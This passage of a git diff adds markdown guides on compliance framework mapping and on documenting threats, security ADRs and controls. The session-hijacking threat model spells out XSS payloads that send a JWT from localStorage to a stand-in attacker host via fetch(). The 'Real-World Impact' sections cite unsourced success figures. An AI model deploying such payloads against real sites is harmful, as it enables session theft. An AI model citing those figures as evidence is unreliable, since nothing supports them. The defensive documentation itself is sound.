Bell-LaPadula + +## Real-World Impact + +**Systems using Bell-LaPadula + fail-fast enforcement**: +- **Elspeth MLS Pipeline**: Prevented VULN-004 class (security level overrides) by refusing to construct pipelines with classification mismatches +- **Government Defense System**: Zero classification violations in 3 years due to construction-time validation (previous system with runtime checks had 12 incidents) +- **Type-system enforcement**: Caught 47 configuration errors at build time vs runtime (100% pre-deployment prevention) + +**Key lesson**: **Make invalid configurations impossible to create. 
Bell-LaPadula + fail-fast construction-time validation prevents all no-read-up and no-write-down violations.** diff --git a/skills/using-security-architect/compliance-awareness-and-mapping.md b/skills/using-security-architect/compliance-awareness-and-mapping.md new file mode 100644 index 0000000..368ec26 --- /dev/null +++ b/skills/using-security-architect/compliance-awareness-and-mapping.md @@ -0,0 +1,563 @@ + +# Compliance Awareness and Mapping + +## Overview + +Navigate diverse compliance frameworks systematically. Core principle: **ALWAYS ask which frameworks apply - don't assume**. + +**Key insight**: Frameworks vary by jurisdiction and industry. Discovery process matters more than memorizing frameworks. + +## When to Use + +Load this skill when: +- Starting projects in regulated environments +- Preparing for compliance audits +- Mapping technical controls to requirements +- Working with healthcare, finance, government data + +**Symptoms you need this**: +- "What compliance frameworks do we need?" +- Preparing for SOC2, HIPAA, PCI-DSS, IRAP audits +- Government/defense contract compliance +- "How do I map our controls to [framework]?" + +**Don't use for**: +- Implementation of specific controls (use `ordis/security-architect/security-controls-design`) +- Security architecture without compliance requirements + +## The Discovery Process + +### Step 1: Ask Three Questions + +**Before** identifying frameworks, ask: + +1. **"What jurisdiction?"** + - Australia → ISM, IRAP, Privacy Act, PSPF + - United Kingdom → Cyber Essentials, NCSC, Official Secrets Act + - United States → NIST CSF, FedRAMP, FISMA + - European Union → NIS2, GDPR, ISO 27001 + +2. **"What industry?"** + - Healthcare → HIPAA (US), GDPR (EU), Australian Privacy Principles + - Finance → PCI-DSS (payments), SOX (US), Basel III + - Government/Defense → Jurisdiction-specific (ISM, FedRAMP, etc.) + - General SaaS → SOC2, ISO 27001 + +3. 
**"What data types?"** + - Personal data → Privacy laws (GDPR, Privacy Act) + - Payment card data → PCI-DSS + - Health records → Healthcare-specific (HIPAA, etc.) + - Classified data → Government frameworks (ISM, FedRAMP) + +**Never assume.** Same project can have multiple frameworks (e.g., Australian hospital SaaS = Privacy Act + Healthcare-specific + possibly SOC2 if B2B). + + +### Step 2: Framework Stacking + +**Multiple frameworks often apply simultaneously.** + +#### Example: Australian Healthcare SaaS + +``` +Data type: Patient health records +Jurisdiction: Australia +Industry: Healthcare +Business model: SaaS (B2B to hospitals) + +Applicable frameworks: +1. Privacy Act 1988 (Australian Privacy Principles) - MANDATORY +2. My Health Records Act 2012 - if using My Health Records system +3. State-specific health regulations (e.g., NSW Health Privacy Manual) +4. SOC2 (if hospitals require it for vendor assurance) +5. ISO 27001 (if targeting enterprise healthcare market) + +Priority: +- MANDATORY: Privacy Act (legal requirement) +- HIGHLY RECOMMENDED: SOC2 (market expectation for B2B SaaS) +- OPTIONAL: ISO 27001 (competitive advantage) +``` + +**Key insight**: Don't just pick one framework. Identify ALL that apply, then prioritize by legal vs market requirements. + + +### Step 3: Understand Framework Structure + +Each framework has structure - learn it before mapping controls. + +#### Common Framework Components + +**1. Control Categories** (groups of related controls): +- Access Control +- Encryption +- Audit Logging +- Incident Response +- Vulnerability Management +- Configuration Management +- Personnel Security +- Physical Security + +**2. Control Requirements** (specific technical/operational requirements): +- "System must enforce least privilege access" +- "All sensitive data encrypted at rest using AES-256" +- "Security events logged and retained for 90 days" + +**3. 
Evidence Requirements** (what auditors need): +- Configuration screenshots +- Log samples +- Policy documents +- Test results +- Interview records + +**4. Assessment Procedures** (how controls are tested): +- Configuration review +- Log analysis +- Penetration testing +- Interviews with staff + + +### Step 4: Control Inventory + +Before mapping to framework, inventory what you have. + +#### Technical Controls Inventory Template + +```markdown +## Access Control + +| Control | Description | Implementation | Evidence Location | +|---------|-------------|----------------|-------------------| +| AC-1 | User authentication | AWS IAM with MFA | aws-iam-config.json | +| AC-2 | Role-based access | PostgreSQL roles | postgres-roles.sql | +| AC-3 | Session timeout | 30-minute idle timeout | app-config.yaml | + +## Encryption + +| Control | Description | Implementation | Evidence Location | +|---------|-------------|----------------|-------------------| +| ENC-1 | Data at rest | AES-256, AWS KMS | kms-config.json | +| ENC-2 | Data in transit | TLS 1.3 | nginx-ssl-config | + +## Audit Logging + +| Control | Description | Implementation | Evidence Location | +|---------|-------------|----------------|-------------------| +| LOG-1 | Authentication events | CloudWatch Logs | cloudwatch-config | +| LOG-2 | Data access logs | PostgreSQL query logs | pg-audit-config | +| LOG-3 | Admin actions | Audit trail table | audit-schema.sql | +``` + +**Why inventory first**: Easier to map existing controls to requirements than build from scratch. + + +### Step 5: Create Traceability Matrix + +Map your controls to framework requirements. 
+ +#### SOC2 Traceability Matrix Example + +```markdown +| SOC2 Criterion | Control Category | Our Control | Implementation | Evidence | Status | +|----------------|------------------|-------------|----------------|----------|--------| +| CC6.1 (Logical access) | Access Control | AC-1: MFA | AWS IAM | aws-iam-config.json | ✅ Complete | +| CC6.1 | Access Control | AC-2: RBAC | PostgreSQL | postgres-roles.sql | ✅ Complete | +| CC6.6 (Encryption) | Encryption | ENC-1: At rest | AWS KMS | kms-config.json | ✅ Complete | +| CC6.6 | Encryption | ENC-2: In transit | TLS 1.3 | nginx-ssl-config | ✅ Complete | +| CC7.2 (Monitoring) | Audit Logging | LOG-1: Auth events | CloudWatch | cloudwatch-config | ✅ Complete | +| CC7.2 | Audit Logging | LOG-2: Data access | PostgreSQL | pg-audit-config | ⚠️ Partial (retention = 30 days, need 90) | +| CC8.1 (Change mgmt) | Config Mgmt | CM-1: Version control | GitHub | github-repos | ❌ Missing approval workflow | +``` + +**Gap identification**: ⚠️ Partial and ❌ Missing items become your remediation backlog. + + +### Step 6: Gap Analysis and Remediation + +Identify missing/insufficient controls, prioritize by risk. 
+ +#### Gap Analysis Template + +```markdown +# Compliance Gap Analysis: SOC2 + +## Critical Gaps (Block Audit) + +### GAP-1: Missing Change Management Approval Workflow +- **Requirement**: CC8.1 - Changes must have approval before production +- **Current state**: Git commits directly to main without approval +- **Impact**: HIGH - Cannot pass SOC2 without this +- **Remediation**: + - Implement GitHub branch protection (require PR approval) + - Create approval policy (2 reviewers for production changes) + - Document change management policy +- **Timeline**: 2 weeks +- **Owner**: DevOps Lead +- **Cost**: $0 (GitHub feature) + +## High-Priority Gaps (Remediate Before Audit) + +### GAP-2: Insufficient Log Retention +- **Requirement**: CC7.2 - Logs retained for 90 days minimum +- **Current state**: PostgreSQL logs retained 30 days +- **Impact**: MEDIUM - Auditor will note as deficiency +- **Remediation**: + - Extend PostgreSQL log retention to 90 days + - Archive to S3 for long-term storage + - Update retention policy document +- **Timeline**: 1 week +- **Owner**: Platform Engineer +- **Cost**: ~$50/month (S3 storage) + +## Low-Priority (Post-Audit) + +### GAP-3: No Formal Incident Response Tabletop Exercises +- **Requirement**: CC7.5 - Test incident response procedures +- **Current state**: IR runbooks exist but not tested +- **Impact**: LOW - Can be remediated post-audit +- **Remediation**: Schedule quarterly IR tabletop exercises +- **Timeline**: 3 months +- **Owner**: Security Team +``` + +**Prioritization**: +1. **Critical**: Must fix before audit (blocks compliance) +2. **High**: Should fix before audit (reduces risk of findings) +3. **Low**: Can defer to post-audit (continuous improvement) + + +## Universal Control Categories + +**Frameworks differ in details but share core categories.** + +### 1. Access Control +- Authentication (passwords, MFA, SSO) +- Authorization (RBAC, ABAC, least privilege) +- Session management (timeouts, revocation) + +### 2. 
Encryption +- Data at rest (AES-256, key management) +- Data in transit (TLS 1.2+) +- Key rotation and access control + +### 3. Audit Logging +- Authentication events (login, logout, failures) +- Data access (who accessed what, when) +- Admin actions (configuration changes, user management) +- Log retention (30-90 days typical, varies by framework) + +### 4. Incident Response +- Detection (monitoring, alerting) +- Containment (isolation procedures) +- Recovery (restoration procedures) +- Lessons learned (post-incident reviews) + +### 5. Vulnerability Management +- Patch management (timely updates) +- Vulnerability scanning (regular cadence) +- Penetration testing (annual or on major changes) + +### 6. Configuration Management +- Secure baselines (hardening guides) +- Change control (approval processes) +- Configuration monitoring (detect drift) + +### 7. Personnel Security +- Background checks (role-appropriate) +- Security training (annual, role-specific) +- Offboarding procedures (revoke access) + +### 8. Physical Security +- Facility access controls +- Environmental controls (fire, flood) +- Equipment disposal (data sanitization) + +**Use this as checklist**: Most frameworks require these categories. Implement once, map to multiple frameworks. + + +## Framework-Specific Nuances + +### SOC2 (Service Organization Control 2) + +**Purpose**: Trust assurance for service providers (SaaS, cloud) + +**Trust Service Criteria**: +- Security (always required) +- Availability (optional) +- Processing Integrity (optional) +- Confidentiality (optional) +- Privacy (optional) + +**Key Requirements**: +- Annual audit (Type I = point-in-time, Type II = over period, typically 6-12 months) +- Control documentation (policies, procedures) +- Evidence of operation (logs, reports, test results) +- Continuous monitoring + +**Common Gap**: SOC2 Type II requires evidence of controls operating over time (not just implemented). Need historical logs, incident reports, change records. 
+ + +### PCI-DSS (Payment Card Industry Data Security Standard) + +**Purpose**: Protect payment card data + +**6 Control Objectives** (spanning 12 requirements): +1. Build and maintain secure network +2. Protect cardholder data +3. Maintain vulnerability management +4. Implement strong access control +5. Regularly monitor and test networks +6. Maintain information security policy + +**Key Requirements**: +- Quarterly vulnerability scans (by Approved Scanning Vendor) +- Annual penetration testing +- Cardholder data encryption (PAN never stored plainly) +- Strict access control (need-to-know basis) + +**Common Gap**: Many developers store PAN (Primary Account Number) in plaintext in logs or databases. PCI-DSS forbids storing unprotected PAN - use tokenization or strong encryption instead. + + +### HIPAA (Health Insurance Portability and Accountability Act) - US Healthcare + +**Purpose**: Protect patient health information (PHI) + +**Key Rules**: +- **Privacy Rule**: Patient rights to access/control their PHI +- **Security Rule**: Administrative, physical, and technical safeguards for electronic PHI (ePHI) +- **Breach Notification Rule**: Notify affected individuals and HHS of any breach of unsecured PHI (breaches affecting 500+ individuals also require HHS and media notification within 60 days) + +**Key Requirements**: +- Encryption (not strictly required but effectively mandatory via "addressable" safeguards) +- Access controls (role-based, minimum necessary) +- Audit trails (track all ePHI access) +- Business Associate Agreements (BAAs with vendors) + +**Common Gap**: Developers forget BAAs are required for ANY vendor processing ePHI (cloud providers, analytics tools, etc.). + + +### ISM (Information Security Manual) + IRAP - Australia Government + +**Purpose**: Protect government information systems + +**IRAP**: Infosec Registered Assessors Program (authorized assessors) + +**Key Requirements**: +- ISM compliance (Essential Eight at minimum) + 1. Application control (whitelisting) + 2. Patch applications + 3. Configure Microsoft Office macros + 4. User application hardening + 5. Restrict administrative privileges + 6. Patch operating systems + 7. 
Multi-factor authentication + 8. Regular backups +- Classification handling (UNOFFICIAL, OFFICIAL, OFFICIAL: Sensitive, PROTECTED, SECRET, TOP SECRET) +- IRAP assessment (required for government contracts) + +**Common Gap**: Essential Eight is minimum, but full ISM compliance has hundreds of controls. Scope carefully based on classification level. + + +### GDPR (General Data Protection Regulation) - EU + +**Purpose**: Protect personal data of EU residents + +**Key Principles**: +- Lawful basis for processing (consent, contract, legal obligation, etc.) +- Data minimization (collect only necessary data) +- Right to access, rectify, erase (data subject rights) +- Data breach notification (72 hours to supervisory authority) + +**Key Requirements**: +- Privacy by design and default +- Data Protection Impact Assessment (DPIA) for high-risk processing +- Data Processing Agreements (DPAs with processors) +- EU representative (if outside EU but processing EU data) + +**Common Gap**: GDPR applies to ANY company processing EU resident data, regardless of company location. Many US companies underestimate scope. + + +## Evidence Collection + +**Auditors need evidence that controls are operating, not just documented.** + +### Evidence Types + +#### 1. Configuration Evidence +```bash +# Example: TLS configuration +openssl s_client -connect api.example.com:443 -tls1_3 +# Save output showing TLS 1.3 enabled + +# Example: IAM MFA enforcement +aws iam generate-credential-report +aws iam get-credential-report --query Content --output text | base64 -d +# Save CSV showing mfa_active=true for every console user +``` + +#### 2. Log Evidence +```bash +# Example: Authentication logs (last 7 days) +aws logs filter-log-events \ + --log-group-name /aws/lambda/auth \ + --start-time $(date -d '7 days ago' +%s)000 \ + --filter-pattern 'authentication' +# Save sample showing successful/failed logins logged +``` + +#### 3. 
Policy Documentation +```markdown +# Example: Access Control Policy +- All users must authenticate with MFA +- Role-based access (roles defined in roles.md) +- Session timeout: 30 minutes +- Annual access review by manager +``` + +#### 4. Test Results +```markdown +# Penetration Test Report (Annual) +- Date: 2025-03-15 +- Tester: Acme Security (SOC2 requirement) +- Findings: 2 medium, 5 low +- Remediation: All medium fixed within 30 days +- Evidence: pentest-report-2025.pdf +``` + +#### 5. Interview Records +```markdown +# Auditor Interview: DevOps Lead (2025-04-10) +Q: How do you handle production changes? +A: Pull request → 2 approvals → CI/CD deploy → post-deploy verification + +Q: How long are logs retained? +A: 90 days in CloudWatch, then archived to S3 for 7 years + +Evidence: interview-notes-devops-2025-04-10.md +``` + + +## Control Mapping Workflow + +### Workflow: Preparing for Audit + +``` +1. Discovery (Week 1) + └─→ Identify applicable frameworks (jurisdiction + industry + data type) + └─→ Understand framework structure (categories, requirements, evidence) + +2. Inventory (Week 2-3) + └─→ Document existing technical controls + └─→ Document operational controls (policies, procedures) + └─→ Document evidence locations + +3. Mapping (Week 4) + └─→ Create traceability matrix (controls → requirements) + └─→ Identify gaps (missing/insufficient controls) + +4. Gap Analysis (Week 5) + └─→ Prioritize gaps (critical/high/low) + └─→ Estimate remediation effort and cost + +5. Remediation (Week 6-12) + └─→ Fix critical gaps (blockers) + └─→ Fix high-priority gaps (reduce risk) + └─→ Document all changes + +6. Evidence Collection (Week 13-14) + └─→ Gather configuration evidence + └─→ Gather log samples + └─→ Finalize policy documents + └─→ Conduct test activities (if needed) + +7. Audit (Week 15-16) + └─→ Provide evidence to auditor + └─→ Answer auditor questions + └─→ Address any findings + +8. 
Continuous Monitoring (Ongoing) + └─→ Maintain controls + └─→ Collect evidence continuously + └─→ Annual re-assessment +``` + + +## Quick Reference: Framework Selection + +| If you have... | Consider these frameworks... | Priority | +|----------------|------------------------------|----------| +| **Australian government data** | ISM, IRAP, PSPF | Mandatory | +| **Australian private healthcare** | Privacy Act, Healthcare-specific | Mandatory | +| **US healthcare (HIPAA data)** | HIPAA, HITECH | Mandatory | +| **EU resident data** | GDPR | Mandatory | +| **Payment card data** | PCI-DSS | Mandatory | +| **US government contracts** | FedRAMP, FISMA, NIST 800-53 | Mandatory | +| **B2B SaaS (any jurisdiction)** | SOC2 | High priority | +| **Enterprise software** | ISO 27001 | Medium priority | +| **UK government** | Cyber Essentials, NCSC | Mandatory | + +**Always verify**: This table is a starting point, not definitive. Consult legal/compliance experts for your specific situation. + + +## Common Mistakes + +### ❌ Assuming Frameworks Without Asking + +**Wrong**: "We need SOC2" (without checking customer requirements) + +**Right**: "What do our customers/contracts require? What jurisdiction are we in?" + +**Why**: You might need multiple frameworks, or different ones than assumed. + + +### ❌ Memorizing Framework Details + +**Wrong**: Try to remember all SOC2 criteria, all PCI-DSS requirements + +**Right**: Learn discovery process, reference frameworks as needed + +**Why**: Frameworks update (e.g., PCI-DSS v4.0 in 2024). Process is stable, details change. + + +### ❌ Mapping Without Inventory + +**Wrong**: Read framework, try to build controls from scratch to match + +**Right**: Inventory existing controls first, then map to framework + +**Why**: Easier to map existing controls than build from requirements. Avoids duplicate implementations. 
+ + +### ❌ No Gap Prioritization + +**Wrong**: List all gaps, start working on first one + +**Right**: Prioritize by impact (critical = blocks audit, high = findings, low = post-audit) + +**Why**: Time/budget limited. Fix blockers first, optimize later. + + +### ❌ Treating Compliance as One-Time + +**Wrong**: Pass audit, stop maintaining controls + +**Right**: Continuous monitoring, annual re-assessment, maintain evidence + +**Why**: Most audits are annual or more frequent. Controls must operate continuously. + + +## Cross-References + +**Use WITH this skill**: +- `ordis/security-architect/security-controls-design` - Implement controls identified in gap analysis +- `muna/technical-writer/clarity-and-style` - Write clear policy documentation + +**Use AFTER this skill**: +- `ordis/security-architect/security-authorization-and-accreditation` - If government/defense (ATO/SSP/SAR) +- `muna/technical-writer/operational-acceptance-documentation` - Document audit package + +## Real-World Impact + +**Projects using systematic compliance mapping**: +- **Healthcare SaaS (Australia)**: Discovered 4 applicable frameworks in discovery (not just Privacy Act). Avoided surprise compliance requirements pre-launch. +- **SOC2 Type II (US)**: Gap analysis found 12 missing controls, prioritized 3 as critical. Remediated in 6 weeks, passed audit on first attempt (vs industry avg 2-3 attempts). +- **IRAP Assessment (Australia Gov)**: Traceability matrix with 200+ ISM controls mapped to 47 technical implementations. Assessor praised "clearest control mapping in 5 years". + +**Key lesson**: **Discovery process (ask jurisdiction/industry/data type) finds ALL applicable frameworks. 
Control mapping with traceability prevents gaps and audit failures.** diff --git a/skills/using-security-architect/documenting-threats-and-controls.md b/skills/using-security-architect/documenting-threats-and-controls.md new file mode 100644 index 0000000..0420b9e --- /dev/null +++ b/skills/using-security-architect/documenting-threats-and-controls.md @@ -0,0 +1,620 @@ + +# Documenting Threats and Controls + +## Overview + +Document security decisions with threat context and traceability. Core principle: **Security documentation explains WHY (threat), WHAT (control), and HOW to verify**. + +**Key insight**: Good security documentation enables verification and informed risk decisions. Bad security documentation is "we're secure" without evidence. + +## When to Use + +Load this skill when: +- Writing threat models +- Documenting security architecture decisions (ADRs) +- Creating control documentation (SSP, compliance) +- Writing security requirements with traceability + +**Symptoms you need this**: +- "How do I document this security decision?" +- Writing threat model documentation +- Creating security ADRs +- Preparing control documentation for audits + +**Don't use for**: +- General documentation (use `muna/technical-writer/documentation-structure`) +- Non-security ADRs + +## Threat Documentation + +### Pattern: Threat Description + +**Structure**: +```markdown +# Threat: [Threat Name] + +## Description +**What**: [What is the threat?] +**How**: [How is attack executed?] +**Who**: [Threat actor - external attacker, insider, malicious code] + +## Affected Assets +- [Asset 1] (e.g., customer database) +- [Asset 2] (e.g., API authentication tokens) + +## Attack Scenarios +### Scenario 1: [Name] +1. Attacker action 1 +2. System response +3. Attacker action 2 +4. Impact + +### Scenario 2: [Name] +[Steps] + +## Likelihood and Impact +**Likelihood**: Low / Medium / High +**Justification**: [Why this likelihood? 
Historical data, attack complexity] + +**Impact**: Low / Medium / High / Critical +**Justification**: [What happens if successful? Data breach? System compromise?] + +**Risk Score**: Likelihood × Impact = [Score] + +## Mitigations +- [Mitigation 1] → See Control: [Control ID] +- [Mitigation 2] → See Control: [Control ID] + +## Residual Risk +After mitigations: [Describe remaining risk] +**Accepted by**: [Role/Name] on [Date] +``` + +### Example: Session Hijacking Threat + +```markdown +# Threat: Session Hijacking via Token Theft + +## Description +**What**: Attacker steals session token and impersonates legitimate user +**How**: XSS attack injects JavaScript to extract token from localStorage +**Who**: External attacker (internet-facing attack), insider with XSS injection capability + +## Affected Assets +- User session tokens (JWT stored in browser localStorage) +- Customer personal data (accessible via hijacked session) +- Administrative functions (if admin session hijacked) + +## Attack Scenarios +### Scenario 1: Stored XSS +1. Attacker injects malicious script via user profile field (e.g., bio) +2. Script stored in database without sanitization +3. Victim views attacker's profile +4. Script executes: `fetch('https://attacker.com/?token=' + localStorage.getItem('jwt'))` +5. Attacker receives victim's token +6. Attacker uses token to make API calls as victim + +### Scenario 2: Reflected XSS +1. Attacker sends victim malicious link: `https://app.com/search?q=<script>fetch('https://attacker.com/?token='+localStorage.getItem('jwt'))</script>` +2. Victim clicks link +3. Search query reflected in page without sanitization +4. Script executes and exfiltrates token + +## Likelihood and Impact +**Likelihood**: MEDIUM +**Justification**: XSS vulnerabilities are common (OWASP Top 10). Application has user-generated content (profiles, comments). No Content Security Policy detected. 
+ +**Impact**: HIGH +**Justification**: Hijacked session grants full user access including: +- Personal data of victim (PII) +- Financial transactions (if applicable) +- Admin functions (if admin token hijacked) +Data breach affects confidentiality, integrity, availability. + +**Risk Score**: Medium × High = HIGH RISK + +## Mitigations +- **CSP (Content Security Policy)**: Prevents inline script execution → See Control: SC-18 +- **HTTPOnly cookies**: Token not accessible to JavaScript → See Control: SC-8 +- **Output encoding**: HTML-encode all user-generated content → See Control: SI-10 +- **Token expiration**: Limit hijacked token lifespan to 30 minutes → See Control: AC-12 +- **Session invalidation**: Logout invalidates token server-side → See Control: AC-12 + +## Residual Risk +After mitigations: **LOW** +- Risk remains if attacker exploits 0-day XSS within 30-minute token window +- Mitigation: Monitoring for anomalous API usage patterns +**Accepted by**: Chief Security Officer on 2025-03-15 +``` + +**Key elements**: +- Specific attack steps (not vague "attacker compromises system") +- Likelihood/impact with justification +- Traceability to controls (Control IDs) +- Residual risk with acceptance + + +## Security ADRs + +### Pattern: Security Architecture Decision Record + +**Structure**: +```markdown +# ADR-XXX: [Security Decision Title] + +## Status +Proposed | Accepted | Deprecated | Superseded by ADR-YYY + +## Context +### Problem Statement +What security problem are we solving? + +### Threat Model +- **Threat 1**: [Brief description] → High risk +- **Threat 2**: [Brief description] → Medium risk + +### Constraints +- Regulatory requirements (GDPR, HIPAA, etc.) 
+- Performance requirements +- Compatibility requirements +- Budget constraints + +### Assumptions +- User authentication level (MFA, password-only) +- Network trust model (zero-trust, perimeter-based) +- Threat actor capabilities (nation-state, script kiddie, insider) + +## Decision +We will [chosen approach]. + +### Security Properties +- **Confidentiality**: [How protected?] +- **Integrity**: [How ensured?] +- **Availability**: [How maintained?] +- **Auditability**: [What's logged?] + +### Technical Details +[Implementation specifics: algorithms, key sizes, protocols] + +## Alternatives Considered + +### Alternative 1: [Name] +**Pros**: [Security benefits] +**Cons**: [Security drawbacks] +**Why not chosen**: [Reason] + +### Alternative 2: [Name] +[Similar structure] + +## Consequences + +### Security Benefits +- [Benefit 1] +- [Benefit 2] + +### Security Trade-offs +- [Trade-off 1: performance vs security] +- [Trade-off 2: usability vs security] + +### Residual Risks +- **Risk 1**: [Description] - Severity: [Low/Medium/High] + - Mitigation: [How addressed] + - Accepted by: [Role] on [Date] +- **Risk 2**: [Description] + +### Ongoing Security Requirements +- [Operational requirement 1: key rotation every 90 days] +- [Operational requirement 2: quarterly security review] + +## Security Controls +- Control AC-2: Account management +- Control IA-5: Authenticator management +- Control SC-8: Transmission confidentiality + +(If compliance framework applicable, map to specific control IDs) + +## Verification +### Testing Strategy +- [Test 1: Penetration test focus area] +- [Test 2: Functional security test] + +### Success Criteria +- [ ] All HIGH threats mitigated or risk-accepted +- [ ] Security properties verifiable via testing +- [ ] Monitoring in place for security events + +## References +- Threat model: [Link to threat model doc] +- Security requirements: [Link to requirements] +- Implementation: [Link to code/config] + + +**Approver**: [Security Architect] on 
[Date] +``` + +### Example: JWT Authentication ADR + +```markdown +# ADR-042: JWT Tokens for API Authentication + +## Status +Accepted + +## Context +### Problem Statement +API requires stateless authentication mechanism for 10,000+ concurrent users across geographically distributed servers. Session storage (Redis) becomes bottleneck at scale. + +### Threat Model +- **Threat 1: Token theft via XSS** → HIGH risk (OWASP Top 10) +- **Threat 2: Token forgery** → HIGH risk (impersonate any user) +- **Threat 3: Token replay** → MEDIUM risk (reuse stolen token) +- **Threat 4: Key compromise** → CRITICAL risk (forge all tokens) + +### Constraints +- Must support 10k requests/sec +- Latency budget: <50ms for auth check +- No shared state (stateless servers) +- GDPR compliance (no PII in tokens) + +### Assumptions +- Attackers have network access (internet-facing API) +- HTTPS enforced (TLS 1.3) +- Users authenticate with email + password + MFA + +## Decision +We will use **JWT (JSON Web Tokens) with RS256 signatures** for API authentication. + +### Security Properties +- **Confidentiality**: Token contains no sensitive data (user ID only). Claims are public but integrity-protected. +- **Integrity**: RS256 signature prevents forgery. Only server with private key can create valid tokens. +- **Availability**: Stateless design scales horizontally without shared session store. +- **Auditability**: Token includes `iat` (issued at) and `exp` (expiration). All auth failures logged to CloudWatch. 
+ +### Technical Details +- **Algorithm**: RS256 (RSA with SHA-256) +- **Key size**: 2048-bit RSA keys +- **Token structure**: + ```jsonc + { + "sub": "user_12345", // subject (user ID) + "iat": 1678886400, // issued at (timestamp) + "exp": 1678888200, // expiration (30 min) + "roles": ["user"] // authorization roles + } + ``` +- **Storage**: HttpOnly, Secure cookie (not localStorage to prevent XSS theft) +- **Expiration**: 30 minutes +- **Revocation**: Server-side blacklist for logout (Redis, key = token `jti` claim, which must be issued alongside the claims shown above; TTL = remaining token lifetime) + +## Alternatives Considered + +### Alternative 1: Opaque Session Tokens (Redis) +**Pros**: Easy revocation (delete from Redis), less crypto complexity +**Cons**: Requires shared Redis cluster (single point of failure), 10ms latency per auth check (Redis lookup), doesn't scale horizontally +**Why not chosen**: Latency and scalability constraints + +### Alternative 2: OAuth 2.0 with Authorization Server +**Pros**: Industry standard, mature ecosystem +**Cons**: Adds complexity (separate auth server), network dependency for token validation, overkill for first-party API +**Why not chosen**: Complexity vs benefit not justified for first-party use case + +### Alternative 3: API Keys +**Pros**: Simplest possible auth +**Cons**: No expiration (long-lived secrets), no user identity (shared key), revocation difficult +**Why not chosen**: Security properties insufficient (no expiration, shared secrets) + +## Consequences + +### Security Benefits +- **Forgery protection**: RS256 signature requires private key (only server has) +- **Tamper detection**: Any modification invalidates signature +- **Time-limited**: 30-minute expiration limits stolen token lifespan +- **HttpOnly cookie**: XSS cannot steal token (JavaScript cannot access) + +### Security Trade-offs +- **Revocation complexity**: Logout requires server-side blacklist (not truly stateless) +- **Key management**: Private key is critical secret (compromise = forge all tokens) +- 
**Clock skew**: Servers must have synchronized clocks for expiration validation + +### Residual Risks +- **Risk 1: Token theft via network sniffing** - Severity: LOW + - Mitigation: HTTPS/TLS 1.3 encrypts tokens in transit + - Residual: None (HTTPS enforced at load balancer, HSTS enabled) + - Accepted by: CISO on 2025-03-15 + +- **Risk 2: Private key compromise** - Severity: CRITICAL + - Mitigation: Key stored in AWS Secrets Manager with IAM restrictions, rotated every 90 days, access audited + - Residual: Key theft remains possible via insider threat or infrastructure compromise + - Accepted by: CISO on 2025-03-15 (continuous monitoring for suspicious token generation) + +- **Risk 3: XSS in legacy pages** - Severity: MEDIUM + - Mitigation: Content Security Policy (CSP) blocks inline scripts, output encoding on all user content + - Residual: 0-day XSS could bypass CSP before patch + - Accepted by: CISO on 2025-03-15 (30-minute token window limits exposure) + +### Ongoing Security Requirements +- **Key rotation**: Rotate the RSA signing key pair every 90 days (automated via AWS Secrets Manager rotation) +- **Monitoring**: Alert on spike in auth failures (>100/min), unusual token generation patterns +- **Blacklist cleanup**: Redis blacklist entries expire with token TTL (no manual cleanup needed) +- **Annual review**: Re-assess threat model and key size (quantum computing advances) + +## Security Controls +- **IA-5(1)**: Authenticator management (password + MFA before token issuance) +- **SC-8**: Transmission confidentiality (HTTPS/TLS 1.3) +- **SC-13**: Cryptographic protection (RS256 signature) +- **AC-12**: Session termination (30-minute expiration, logout blacklist) + +## Verification +### Testing Strategy +- **Penetration test**: Focus on token theft, forgery attempts, replay attacks (Q2 2025) +- **Functional test**: Verify token expiration at 30:01 minutes, verify a blacklisted token is rejected after logout +- **Load test**: 10k concurrent users, <50ms auth latency + +### Success 
Criteria +- [x] All HIGH threats have mitigations +- [x] RS256 signature prevents forgery (tested) +- [x] HttpOnly cookie prevents XSS theft (verified in browser) +- [x] CloudWatch monitors auth failures +- [x] Key rotation automated + +## References +- Threat model: `/docs/threat-model-api-auth.md` +- Implementation: `src/auth/jwt-middleware.ts` +- Key management: `infrastructure/secrets-manager-key-rotation.yaml` + + +**Approver**: Security Architect (Jane Smith) on 2025-03-15 +``` + +**Key elements**: +- Threat model context (4 threats with risk levels) +- Security properties (C/I/A/Auditability) +- Specific technical details (RS256, 2048-bit, HttpOnly cookie) +- Alternatives with security pros/cons +- Residual risks with severity and acceptance +- Traceability to controls (IA-5, SC-8, SC-13, AC-12) +- Verification strategy + + +## Control Documentation + +### Pattern: Security Control Description + +**Use for**: SSP (System Security Plan), compliance documentation, audit evidence. + +**Structure**: +```markdown +## Control: [ID] - [Name] + +### Control Objective +What does this control protect against? What security property does it enforce? + +### Implementation Description +**How it works** (technical details): +- Component 1: [Description] +- Component 2: [Description] + +**Configuration**: +```yaml +# Example config snippet +setting: value +``` + +**Responsible Parties**: +- Implementation: [Role, Name] +- Operation: [Role, Name] +- Monitoring: [Role, Name] + +### Assessment Procedures +**How to verify this control works**: + +1. **Examine**: Review [documentation, configuration, logs] +2. **Interview**: Ask [role] about [process] +3. 
**Test**: Execute [test procedure], expected result: [outcome] + +### Evidence Artifacts +- Configuration: `/path/to/config.yaml` +- Logs: CloudWatch Log Group `/aws/lambda/auth`, query: `[Filter pattern]` +- Policy: `/docs/account-management-policy.pdf` +- Test results: `/evidence/penetration-test-2025-Q1.pdf` + +### Compliance Mapping +- NIST SP 800-53: AC-2 +- SOC2: CC6.1 (Logical access controls) +- ISO 27001: A.9.2.1 (User registration and de-registration) +``` + +### Example: Account Management Control + +```markdown +## Control: AC-2 - Account Management + +### Control Objective +Ensure only authorized individuals have system access. Prevent unauthorized access via account lifecycle management (creation, modification, disablement, removal). + +**Security properties enforced**: +- **Authentication**: Valid accounts only +- **Accountability**: All accounts traceable to individuals +- **Least privilege**: Accounts have minimum necessary permissions + +### Implementation Description +**How it works**: +- **Account creation**: ServiceNow workflow → Manager approval → Automated provisioning via Terraform +- **Access assignment**: Role-based access control (RBAC) - roles defined in `/docs/rbac-roles.md` +- **Inactivity disablement**: Automated script checks last login date, disables accounts after 30 days inactivity +- **Account removal**: Offboarding workflow triggers immediate disablement, deletion after 90-day retention period + +**Configuration**: +```python +# Account lifecycle settings +INACTIVITY_THRESHOLD_DAYS = 30 +ACCOUNT_RETENTION_DAYS = 90 +MANAGER_APPROVAL_REQUIRED = True +``` + +**Responsible Parties**: +- **Implementation**: DevOps Engineer (John Doe) +- **Operation**: System Administrator (Jane Smith) +- **Monitoring**: Information System Security Officer (ISSO, Bob Johnson) + +### Assessment Procedures +**How to verify this control works**: + +1. 
